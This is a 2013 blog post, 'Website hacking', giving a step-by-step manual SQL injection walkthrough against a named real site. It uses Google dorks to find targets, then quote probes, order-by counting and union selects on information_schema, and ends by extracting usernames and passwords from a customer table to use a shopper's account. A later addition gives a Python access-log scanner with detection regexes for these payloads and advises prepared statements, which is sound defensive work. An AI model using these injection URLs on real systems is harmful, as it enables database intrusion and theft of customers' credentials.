Mar 21, 2013

Website hacking


Step 1
Find a website with a URL ending with
.php?id=4383
where 4383 can be any number. In Google I have some tricks with which you can actually look for sites ending with this tag.
Use the following commands in Google.
inurl:shop.php?id=
inurl:shopping.php?id=
inurl:sell.php?id=
Now once you get any website with this URL, open that website. For demonstration I am taking a website
http://pkmotors.com/ads_detail.php?nAddsID=17156%27
Step 2
Add ‘ after id=****
Now, if you get an error or a blank page after adding the ‘, then the site is accepting SQL commands from the browser's address bar, which means the site is vulnerable to SQL injection.
http://pkmotors.com/ads_detail.php?nAddsID=17156%27′
Step 3
Now the next step is to find out the number of vulnerable links
example – id=43434′ order by 1 –
Check the number of vulnerable links by trying the values 1, 2, 3, 4, etc., for as long as the page does not give an error.
http://pkmotors.com/ads_detail.php?nAddsID=17156%27 order by 1 / order by 2 / etc until it comes blank
Step 4
Find out names of tables and columns
http://pkmotors.com/ads_detail.php?nAddsID=-17156%27 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 –
Step 5
Now what we have to do next is
replace the link above with -17156′ union all select table_name,*,*,*,* from information_schema.tables –
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name%20from%20information_schema.tables%20–
Step 6
Here group_concat will give the details of all the tables in the website's database
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28table_name%29%20from%20information_schema.tables%20%20–
Step 7
But since we are hackers :p, we are always interested in one table, and that is the admin table, so look for the admin table in the list of displayed table names. Here we chose the customer table because this is a shopping website and we want to shop from a user's account, so we will search for the columns in the customer table with the command below
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=%27customer%27%20–
Step 8
The same again, extracting the information for every column of that table via group_concat
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115,116,111,109,101,114%29%20–
Step 9
Now we get two column fields after executing the commands above, namely
strUsername
strPassword
Now the limit function below will search for the username of the particular person with id=1684
// here %20 in the URL is not a command; it appears automatically once we execute our commands in the browser
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strUsername%20from%20customer%20limit%201684,1%20–
Step 10
We finally got the username of the person, and now we will look for the password of that person by typing the same command with strPassword in place of strUsername.
http://pkmotors.com/ads_detail.php?nAddsID=-17156%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,strPassword%20from%20customer%20limit%201684,1%20–
Finally you have the username and the password of the person of your wish, now do whatever you want to do )
NOTE: All these hacking steps are just meant to teach how SQL injection can be done; no illegal work should be done with the above skills.
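Seen from the server side, the requests in Steps 2 to 10 leave a recognisable trail in the web access log. The following is an added example, not part of the original post: it scans constructed log lines for the markers used in this walkthrough, and the log format, the `/item.php` path, the sample lines and the function names are all assumptions.

```python
import re
from urllib.parse import unquote_plus

# Markers taken from the request shapes shown in the steps above.
MARKERS = {
    "quote_probe": re.compile(r"=-?\d+'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(\s*,\s*\d+)+\s*\)", re.I),
}

# Assumed combined-log style: client IP first, request line in double quotes.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(line):
    """Return (client_ip, sorted marker names) for one access-log line."""
    m = REQUEST.match(line)
    if not m:
        return None, []
    ip, target = m.groups()
    query = target.partition("?")[2]
    # Decode twice so double-encoded input (%2527) is still recognised.
    decoded = unquote_plus(unquote_plus(query))
    return ip, sorted(n for n, rx in MARKERS.items() if rx.search(decoded))

def scan(lines):
    """Collect marker hits per client so a probe-then-enumerate run stands out."""
    hits = {}
    for line in lines:
        ip, names = classify(line)
        if names:
            hits.setdefault(ip, set()).update(names)
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical path).
SAMPLE = [
    '198.51.100.7 - - [21/Mar/2013:10:00:01 +0000] "GET /item.php?id=17 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Mar/2013:10:00:05 +0000] "GET /item.php?id=17%27 HTTP/1.1" 500 0',
    '203.0.113.9 - - [21/Mar/2013:10:00:09 +0000] "GET /item.php?id=17%27%20order%20by%203%20-- HTTP/1.1" 200 0',
    '203.0.113.9 - - [21/Mar/2013:10:00:14 +0000] "GET /item.php?id=-17%20union%20all%20select%201,group_concat%28table_name%29%20from%20information_schema.tables%20-- HTTP/1.1" 200 900',
    '203.0.113.9 - - [21/Mar/2013:10:00:20 +0000] "GET /item.php?id=-17%20union%20all%20select%201,group_concat%28column_name%29%20from%20information_schema.columns%20where%20table_name=char%2899,117,115%29%20-- HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, names in scan(SAMPLE).items():
        print(ip, sorted(names))
```

A single client that accumulates several of these markers within a short period is worth alerting on even when each response was a 200. The underlying fix remains on the application side: bind the id as a parameter in a prepared statement instead of concatenating it into the query.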